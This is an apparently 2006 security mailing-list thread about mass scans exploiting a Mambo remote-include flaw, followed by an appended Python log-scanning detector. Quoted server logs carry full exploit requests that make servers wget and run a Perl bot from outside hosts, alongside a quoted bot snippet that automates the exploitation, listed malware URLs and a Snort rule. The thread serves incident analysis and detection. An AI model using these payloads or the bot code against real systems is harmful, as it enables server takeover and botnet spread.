I was looking at the scripts they try to download and it does not look like a common perl bot (connecting to irc). It's also written in php and by a Brazilian person (comments in Portuguese) and with terrible code :) I didn't have time to fully look at it, though.
These are the pages they access:

http://usuarios.lycos.es/athos666/d25/
http://usuarios.lycos.es/athos666/d25/therules25.dat
http://radius01.comete.ci/tool.gif

I'm attaching them just in case they remove these pages (please be aware that they are scripts, not gifs :)).

Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net

--- Jamie Riden <[EMAIL PROTECTED]> wrote:

> Seems to have some kind of google search code for the particular
> vulnerability - haven't seen this before:
>
> if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
>     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");
>     srand;
>     my $itime = time;
>     my ($cur_time);
>     my ($exploited);
>     $boturl=$2;
>     $cur_time = time - $itime;$exploited = 0;
>     while($1>$cur_time){
>         $cur_time = time - $itime;
>         @urls=fetch();
>         foreach $url (@urls) {
>             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Trying to exploit ".$url);
>             $cur_time = time - $itime;
>             my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
>             $url =$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";
>             $page = http_query($url);
>             $exploited = $exploited + 1;
>         }
>     }
>     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");
>
> This is a quick stab at a snort sig:
>
> alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80 (msg: "BLEEDING-EDGE perlb0t Bot Reporting Scan/Exploit"; flow: to_server,established; content:"PRIVMSG|20|"; nocase; within: 80; tag: session, 20, packets; pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i"; within:16; pcre:"/(Exploiting|Exploited|Attacking|Scanning|perlb0t)/i"; classtype: trojan-activity; sid: xxxx; rev:1; )
>
> but I'm sure this could be improved.
>
> cheers,
> Jamie
>
> On 15/05/06, Jamie Riden <[EMAIL PROTECTED]> wrote:
> > Looks like some sort of shellbot wanting to connect to an IRC channel
> > #abusers on abuser.hacked.in:8080.
> >
> > I've been seeing occasional probes for Mambo's index.php on and off
> > for a while now - the first part is similar to
> > http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
> > payloads are slightly different, though it always seems to end up with
> > an IRC bot of some kind.
> >
> > I usually see them coupled with scans for coppermine and other remote
> > include issues, plus xmlrpc probes.
> >
> > I think you're seeing an attempt to exploit issue#3 here -
> > http://secunia.com/advisories/18935/
> >
> > cheers,
> > Jamie
> >
> > On 14/05/06, Daniel Cid <[EMAIL PROTECTED]> wrote:
> > > Since Thursday night I'm seeing a high volume of scans
> > > on different web servers for possibly the following
> > > vulns:
> > >
> > > http://secunia.com/advisories/14337/
> > > http://www.osvdb.org/displayvuln.php?osvdb_id=10180
> > >
> > > However, they say the problem is on function.php and
> > > I'm seeing them on index.php. Can anyone confirm that?
> > >
> > > Some log samples:
> > >
> > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> > > 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> >
> > --
> > Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED]
> > NZ Honeynet project - http://www.nz-honeynet.org/
>
> --
> Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED]
> NZ Honeynet project - http://www.nz-honeynet.org/
Attachment: therules25.dat
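Detection logic for the index.php probes quoted in the thread, added here as an example and not code from any of the posters: it parses Apache combined-log lines, flags a request only when the Mambo mosConfig_absolute_path parameter carries a remote URL (a local value is left alone), and extracts the include host plus whatever the cmd= chain would fetch. The sample log lines, the TEST-NET source addresses and the dropper.example host are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Apache combined log format, as in the samples quoted in the thread.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) '
                    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)                      # include value points off-box
URL_IN_CMD = re.compile(r'(?:https?|ftp)://\S+?(?=[;\s?]|$)', re.I)  # URLs inside the cmd= chain
INCLUDE_PARAMS = {"mosConfig_absolute_path"}                          # Mambo path variable abused here
# Constructed sample lines modelled on the thread's (TEST-NET addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://dropper.example/i/cmd.txt?'
    '&cmd=cd%20/tmp;wget%20http://dropper.example/i/xentonix;perl%20xentonix;rm%20-rf%20xentonix?'
    ' HTTP/1.0" 404 167 "-" "Mozilla/5.0"',
    # Benign request to the same component: no include parameter at all.
    '198.51.100.7 - - [12/May/2006:15:30:01 -0300] "GET /index.php?option=com_content&Itemid=1'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Include parameter present but local: not a remote include, so not this probe.
    '198.51.100.8 - - [12/May/2006:15:31:15 -0300] "GET /index.php?mosConfig_absolute_path=/var/www'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse_query(query):
    """Split on '&' only (the payload itself contains ';') and percent-decode each side."""
    out = {}
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        out[unquote(key)] = unquote(val)
    return out

def classify(line):
    """Return a finding for a Mambo remote-include probe, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_query(urlsplit(m.group("target")).query)
    hits = [(k, v) for k, v in params.items() if k in INCLUDE_PARAMS and REMOTE.match(v)]
    if not hits:
        return None
    key, inc = hits[0]
    cmd = params.get("cmd", "")
    return {"src_ip": m.group("ip"), "ts": m.group("ts"), "param": key, "cmd": cmd,
            "status": int(m.group("status")),        # 404 in the thread's samples: still a probe
            "include_host": urlsplit(inc).hostname,  # host serving the first-stage script
            "stage2_urls": URL_IN_CMD.findall(cmd)}  # what the cmd= chain would wget

def scan(lines):
    """Classify every line; return the findings plus a per-source-IP probe count."""
    findings = [f for f in map(classify, lines) if f]
    return findings, dict(Counter(f["src_ip"] for f in findings))
```

Run `scan(SAMPLE_LOG)` to see only the first line flagged; the response status is deliberately ignored, since the thread's own samples all returned 404 and were still probes worth recording.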

